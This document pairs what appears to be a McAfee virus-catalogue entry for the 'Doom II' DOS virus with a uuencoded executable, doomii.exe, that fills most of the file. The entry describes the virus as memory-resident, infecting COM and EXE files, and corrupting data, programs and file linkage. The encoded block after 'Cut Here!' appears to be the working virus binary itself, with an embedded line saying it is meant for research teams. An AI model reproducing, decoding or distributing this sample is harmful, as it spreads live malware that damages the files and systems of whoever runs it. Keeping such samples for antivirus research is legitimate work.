                        VIRUS CHARACTERISTICS LIST B95
                   Copyright 1989-1992 by McAfee Associates
                             All Rights Reserved.
                             TEL 1-(408) 988-3832

The  following  list  outlines  the major characteristics  of  the  known
IBM  PC  and  compatible virus strains identified by  SCAN.   The  number
of  known  variants of each virus is also listed.  This number is  listed
in  parenthesis  beside  the name of the  strain.   The total  number  of
known  viruses is summed at the end of the list.  The Clean-Up virus I.D.
code is included in brackets.
==========================================================================
A Infects Fixed Disk Partition Table-A-------------------+
9 Infects Fixed Disk Boot Sector-----9-----------------+ |
8 Infects Floppy Diskette Boot-------8---------------+ | |
7 Infects Overlay Files--------------7-------------+ | | |
6 Infects EXE Files------------------6-----------+ | | | |
5 Infects COM files------------------5---------+ | | | | |
4 Infects COMMAND.COM----------------4-------+ | | | | | |
3 Virus Installs Self in Memory------3-----+ | | | | | | |
2 Virus Uses Self-Encryption---------2---+ | | | | | | | |
1 Virus Uses STEALTH Techniques------1-+ | | | | | | | | |
                                       | | | | | | | | | | Increase in
                                       | | | | | | | | | |  Infected
                                       | | | | | | | | | |  Program's
                                       | | | | | | | | | |    Size
                                       1 2 3 4 5 6 7 8 9 A      |
                                       | | | | | | | | | |      |
Virus                   Disinfector    V V V V V V V V V V      V     Damage
-----------------------------------------------------------------------------
Doom II [Dm2]              Clean-Up    . . x . x x . . . .    2504    O P D L

LEGEND:

Size Increase:
N/A        - Virus does not attach to files.
None       - Virus does not change file size (attaches to tag end of file)
Overwrites - Virus overwrites beginning of file no file size change
All Others - The length in bytes by which a file will increase when infect

Damage Fields:
B - Corrupts or overwrites the boot sector
D - Corrupts data files
F - Formats or overwrites all/part of disk
L - Directly or indirectly corrupts file linkage
O - Affects system run-time operation
P - Corrupts program or overlay files

Disinfectors:
Clean-Up   - Clean-Up universal virus disinfector
SCAN /D    - VIRUSCAN with /D option
SCAN /D /A - VIRUSCAN with /D and /A options
MDISK /P   - MDISK with "P" option
All Others - The name of disinfecting program

				Cut Here!
----------------------------------------------------------------------------
begin 644 doomii.exe
M35JH`08``0`@````__\-```$`````3T`(@````$`^R!R:@$`````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````"X`@".V+H``+0)S2&ZG0"T"<TANHX`M`G-(;C_
M3,TA``T*071T96YT:6]N.B!4:&ES('9I<G5S('-A;7!L92!U<V5S(&]N;'D@
M:6X@<F5S96%R8V@@=&5A;7,N#0H@("`@("`@("`@(%!L96%S92!D;R!N;W0@
M=7-E(&EN(&IO:VEN9R!O<B!S971T:6YG('1R87`@;VX@<V]M96]N92X-"@T*
M5V%R;FEN9R$@(B0B(&-O;65S(&EN(0T*!R1$3T]-($E)(%9I<G5S)```````
M4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+
M("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-4
M04-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@
M(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#
M2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!3
M5$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@
M("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!
M0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@
M4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+
M("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-4
M04-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@
M(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#
M2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!3
M5$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@
M("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!
M0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@
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
.:$U,1U$.`FQA=PPH+P8`
`
end
